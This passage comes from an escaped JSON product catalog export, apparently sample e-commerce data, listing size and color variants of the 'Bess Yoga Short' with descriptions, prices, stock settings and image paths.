ain.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Yellow\"},\"1924\":{\"sku\":\"WSH05-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-29-Blue\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1925\":{\"sku\":\"WSH05-29-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-29-Purple\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-29-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Purple\"},\"1926\":{\"sku\":\"WSH05-29-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-29-Yellow\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-29-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Yellow\"},\"1927\":{\"sku\":\"WSH05-30-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-30-Blue\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-30-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Blue\"},\"1928\":{\"sku\":\"WSH05-30-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-30-Purple\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-30-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Purple\"},\"1929\":{\"sku\":\"WSH05-30-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-30-Yellow\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-30-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Yellow\"},\"1930\":{\"sku\":\"WSH05-31-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-31-Blue\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-31-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Blue\"},\"1931\":{\"sku\":\"WSH05-31-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-31-Purple\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-31-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Purple\"},\"1932\":{\"sku\":\"WSH05-31-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-31-Yellow\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 